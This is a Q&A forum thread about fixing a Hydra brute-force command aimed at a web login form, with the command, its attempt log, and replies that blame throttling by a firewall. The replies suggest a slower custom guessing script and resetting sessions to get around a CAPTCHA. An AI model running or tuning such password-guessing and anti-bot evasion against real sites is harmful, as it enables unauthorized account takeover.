# Brute force web page using Hydra

Tags: brute-force, password-cracking, hydra

What is the problem in this command for hydra, it returns these errors:

Command :

```
hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V
```

Errors :

```
[DATA] max 16 tasks per 1 server, overall 64 tasks, 100 login tries (l:1/p:100), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726002" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726003" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726004" - 5 of 100 [child 4] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726005" - 6 of 100 [child 5] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726006" - 7 of 100 [child 6] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726007" - 8 of 100 [child 7] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726008" - 9 of 100 [child 8] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726009" - 10 of 100 [child 9] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726010" - 11 of 100 [child 10] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726011" - 12 of 100 [child 11] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726012" - 13 of 100 [child 12] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726013" - 14 of 100 [child 13] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726014" - 15 of 100 [child 14] (0/0)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726015" - 16 of 100 [child 15] (0/0)
[ERROR] Child with pid 4712 terminating, cannot connect
[ERROR] Child with pid 4713 terminating, cannot connect
[ERROR] Child with pid 4714 terminating, cannot connect
[ERROR] Child with pid 4715 terminating, cannot connect
[ERROR] Child with pid 4716 terminating, cannot connect
[ERROR] Child with pid 4717 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726000" - 16 of 101 [child 0] (0/1)
[ERROR] Child with pid 4718 terminating, cannot connect
[ERROR] Child with pid 4719 terminating, cannot connect
[ERROR] Child with pid 4720 terminating, cannot connect
[ERROR] Child with pid 4721 terminating, cannot connect
[ERROR] Child with pid 4722 terminating, cannot connect
[ERROR] Child with pid 4723 terminating, cannot connect
[ERROR] Child with pid 4724 terminating, cannot connect
[ERROR] Child with pid 4725 terminating, cannot connect
[RE-ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726001" - 16 of 104 [child 1] (0/4)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726016" - 17 of 104 [child 2] (0/4)
[ERROR] Child with pid 4726 terminating, cannot connect
[ERROR] Child with pid 4727 terminating, cannot connect
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726017" - 18 of 112 [child 3] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726018" - 19 of 112 [child 4] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726019" - 20 of 112 [child 5] (0/12)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726020" - 21 of 114 [child 6] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726021" - 22 of 114 [child 7] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726022" - 23 of 114 [child 8] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726023" - 24 of 114 [child 9] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726024" - 25 of 114 [child 10] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726025" - 26 of 114 [child 11] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726026" - 27 of  114 [child 12] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726027" - 28 of 114 [child 13] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726028" - 29 of 114 [child 14] (0/14)
[ATTEMPT] target 172.20.10.4 - login "950421521" - pass "311726029" - 30 of 114 [child 15] (0/14)
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
```

And I try these commands, none of them are working :

```
$ hydra -l 950421521 -P /home/jarvis/Desktop/ams-2.lst -s 172.20.10.4 http-post-form "/login.aspx:&txtUserName=^USER^&txtPassword=^PASS^&LoginButton=Login:Login failed" -V
```

Comment: I think "cannot connect" is your clue ...

Answer (score 1):

> [ERROR] Child with pid 4712 terminating, cannot connect

That usually means that the site stopped accepting HTTP connections form you; could be that it's:

- Too slow in responding, and hydra is timing out.
- Server is overloaded and crashing, hydra is timing out.
- (most probably) a WAF / firewall is throttling your requests since you're overloading the service.

You're probably better of writing a quick script that tries these (Hydra has a higher false positive rate when doing form logins), and throttles down a bit; find the sweet spot before it starts dropping your requests.

Comment: One question : can captcha make this error because in the first fresh page it isnt any captcha , but after the first wrong login (by manually I checked it) shows the very simple captcha to enter . so can it cause the problem for hydra. how can we pass it !?

Comment: One more thing if user enter username and password the page continue to the new page and said username and password is wrong and there is and ok click after push that come back again to the first login page after twice at these works the captcha apear for entering so how can i success in this situation ??

Comment: Bypassing a captcha is not an easy thing; that's why they exist.  I'm not sure what you mean with your second question; punctuation is your friend. :)  

Basically, through a tool such as burp or fiddler, find out what parameters are sent to which endpoint; if a captcha only pops up after a (certain amount of) failed attempts; see if that can be bypassed (reset sessions).

Comment: aha i get something but at first can captcha make a problem for hydra in this situation ??

Comment: Big time, a captcha is solely designed to make sure that it's a person doing the request, not a bot/script/brute force tool.  Hydra is considered the latter.